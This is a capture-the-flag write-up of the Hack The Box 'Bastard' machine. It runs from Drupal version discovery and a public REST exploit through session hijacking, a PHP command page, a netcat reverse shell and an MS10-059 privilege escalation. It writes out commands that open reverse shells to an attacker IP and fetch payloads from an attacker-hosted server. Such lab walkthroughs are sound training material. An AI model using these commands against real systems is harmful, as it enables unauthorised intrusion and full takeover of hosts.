Hack The Box — Bastard — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
Jun 7, 2023


bastard.htb

This is my 27th write-up from TJNull’s list of HackTheBox machines for OSCP practice, and this one covers Bastard. The full list can be found here.

A typical penetration test or CTF has three major phases:

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

First, let’s run an nmap scan on the default ports to see which services are running on the target.

nmap -sC -sV -O -Pn -oA nmap/initial bastard.htb
nmap

Only one of the open ports is a service I’m familiar with: HTTP on port 80. The rest are MSRPC. So, let’s run a full Nmap scan.

nmap -sC -sV -O -Pn -p- -oA nmap/allports bastard.htb

That reveals the same results, so let’s start by enumerating the HTTP server.

http server

Hmm… It’s running Drupal CMS. I tried admin:admin and admin:password, but neither worked. So, let’s check robots.txt.

Here we have a disallowed entry, /CHANGELOG.txt. Let’s check it, because the changelog usually reveals the installed version, since it is updated with every release.

Here, we can see that the last update was from Drupal 7.53 to Drupal 7.54.

Now we have a version number, and the system was last updated on 2017-02-01. That is fairly old, so we may find public exploits easily.
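As an added example (not part of the original write-up), here is a small Python checker for the two things enumerated above: the Disallow entries in robots.txt and the release header at the top of CHANGELOG.txt, which gives the installed version and how stale it is. The robots.txt and changelog text below are constructed samples; only the "Drupal X.Y, YYYY-MM-DD" header layout follows Drupal’s real file.

```python
import re
from datetime import date

# Constructed sample of the start of a Drupal 7 CHANGELOG.txt. The layout is the
# one Drupal uses (a "Drupal X.Y, YYYY-MM-DD" header per release, newest first);
# the bullet entries are made up.
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- (constructed entry) Fixed an issue in the example module.

Drupal 7.53, 2016-12-07
-----------------------
- (constructed entry) Fixed another issue.
"""

# Constructed robots.txt containing the entry the write-up follows.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /includes/
Disallow: /CHANGELOG.txt
Disallow: /cron.php
"""

RELEASE_RE = re.compile(r"^Drupal (\d+\.\d+(?:\.\d+)?), (\d{4}-\d{2}-\d{2})\s*$", re.M)


def disallowed_paths(robots_txt):
    """Paths a robots.txt asks crawlers to skip; each is worth a manual look."""
    return [line.split(":", 1)[1].strip()
            for line in robots_txt.splitlines()
            if line.lower().startswith("disallow:")]


def releases(changelog_txt):
    """[(version, release_date), ...] in file order (newest first in Drupal 7)."""
    return RELEASE_RE.findall(changelog_txt)


def installed_version(changelog_txt):
    """The first header is the release the site was last updated to."""
    found = releases(changelog_txt)
    return found[0] if found else None


def release_age_days(release_date, today):
    """Days between the release date and a reference date, both YYYY-MM-DD."""
    return (date.fromisoformat(today) - date.fromisoformat(release_date)).days
```

On the sample text this reports an exposed changelog and a 7.54 install dated 2017-02-01, which is the same finding the screenshots above show.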

Initial Foothold

A quick Google search for “Drupal 7.54 exploit” gives us the following exploit.

https://www.exploit-db.com/exploits/41564

Looking into the code, we can see that we need two things: the URL and the REST endpoint path. We have the URL, which is the target’s IP (added to my /etc/hosts), but we don’t know the REST endpoint.

Let’s do a Google search.

And we get this article. Visiting it, we see:

admin/config/services/rest

Let’s navigate to that.

Nope! That’s not it. With a little trial and error, I found that it’s at /rest.

So our REST endpoint is /rest. Let’s edit the exploit code and run it with PHP.

(You may need to set the URL to the IP address if you have not configured your /etc/hosts file.)

Let’s run the exploit. (My exploit filename is drupal.php.)

php drupal.php

The exploit stores the session information in session.json and the user information in user.json.

(If you get an error like “Uncaught Error: Call to undefined function curl_init()”, install php-curl with sudo apt install php-curl.)

Let’s look at user.json.

user.json

We have the username and the password hash. We could try cracking the hash, but we don’t need to: that can take time, and we already have session information stored in session.json.

session.json

We can set these cookies using the Cookie Manager add-on for Firefox. You can install it from here: https://addons.mozilla.org/en-US/firefox/addon/a-cookie-manager/

Click New Cookie at the bottom right.

cookie manager

Set Name to the session_name value and Value to the session_id value from session.json, then click Save at the bottom left.

Now refresh the target web server.

admin login

And we are logged in as admin. The rest is easy.

Go to the Modules tab.

Make sure that PHP filter is checked.

Then go to Add Content and select Basic Page.

Set the Title to anything, paste the code shown below, make sure that Text format is set to PHP code, then scroll down and click Save.

(I cannot write this code here for you to copy, because when I did, I wasn’t able to save the post; maybe Medium detected it as malicious.)

In the code above, we are basically creating two functions that we can call to upload files or execute commands. (You will need to replace the IP address with your own.)

Our page has been created. Let’s try executing a command (whoami).

And we can execute commands. I also added a file-upload function, fupload, so that I can upload netcat to the target and then use fexec to run it and get a reverse shell.

Let’s copy nc.exe to our attacking machine’s current working directory so we can host it with Python’s HTTP server.

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .

Now we can host this directory with Python’s HTTP server.

python3 -m http.server 80

Now upload it to the target using the fupload function.

We got a hit on our Python HTTP server, which means the target fetched the file. Now let’s start a listener and run nc.exe through the fexec function to get a reverse shell.

http://bastard.htb/node/5?fexec=nc.exe 10.10.16.32 4242 -e cmd.exe

And we got a shell. But we are not NT AUTHORITY\SYSTEM yet.

Privilege Escalation

Let’s grab the target system’s info using the systeminfo command.

systeminfo

Copy all this information and paste it into a file, sysinfo.txt.

We will use Windows Exploit Suggester. You can grab it from here:
https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Let’s update the exploit suggester:

python2 windows-exploit-suggester.py --update

This creates a database file in .xls format.

Now let’s run the exploit suggester with the system info we saved on our attacking machine and the database it just created:

python windows-exploit-suggester.py --database 2023-06-06-mssb.xls --systeminfo sysinfo.txt
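As an added example, not from the write-up or from the Windows Exploit Suggester project, the following Python reads a systeminfo dump the way the suggester does: it pulls the OS name, build and installed KB list, and reports bulletins whose update is missing. The systeminfo text is a constructed sample, and the MS10-059 to KB982799 mapping is assumed here and should be checked against the downloaded database before trusting the result.

```python
import re

# Constructed excerpt in the layout "systeminfo" prints on an English Windows
# host. Host name, build and the installed KB numbers are made up.
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2999999
                           [02]: KB3000000
Network Card(s):           1 NIC(s) Installed.
"""

# Bulletin -> KB mapping. KB982799 as the update for MS10-059 is an assumption
# made for this example; confirm it against the MSRC .xls the suggester downloads.
REQUIRED = {"MS10-059": "KB982799"}

# "Key:   value" lines; hotfix rows start with "[NN]:" and so do not match.
FIELD_RE = re.compile(r"^([A-Za-z() ]+?):\s+(.*)$", re.M)
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text):
    """Return OS name, version, architecture and the installed KB list."""
    fields = {k.strip(): v.strip() for k, v in FIELD_RE.findall(text)}
    return {
        "os_name": fields.get("OS Name", ""),
        "os_version": fields.get("OS Version", ""),
        "arch": fields.get("System Type", ""),
        "hotfixes": KB_RE.findall(text),  # empty when systeminfo prints N/A
    }


def missing_patches(info, required=REQUIRED):
    """Bulletins whose KB does not appear in the host's hotfix list."""
    installed = set(info["hotfixes"])
    return [bulletin for bulletin, kb in required.items() if kb not in installed]


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_name"], "|", info["os_version"], "|", info["arch"])
    print("missing bulletins:", missing_patches(info))
```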

I tried different exploits, but the one that worked for me was MS10-059. There’s a very good resource, Windows Kernel Exploits:

https://github.com/SecWiki/windows-kernel-exploits/

Here we have the MS10-059 directory:

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

We can grab the compiled binary directly, so we don’t need to compile it ourselves.

Since our web server is still running and we know we can upload files with the PHP script we created, let’s use that.

http://bastard.htb/node/5?fupload=MS10-059.exe

We got a hit on our Python HTTP server for the exploit.

Let’s check in our reverse shell whether the exploit has been uploaded.

And it has. Let’s run it.

It tells us how to use the exploit. It seems to be a reverse-shell exploit, so let’s start a listener to catch the shell.

rlwrap nc -lvnp 8080

Now run the exploit with our attacking machine’s IP address and the port we are listening on (8080 in my case):

MS10-059.exe 10.10.16.32 8080

Let’s check the listener.

And we got NT AUTHORITY\SYSTEM (root) shell!

:)
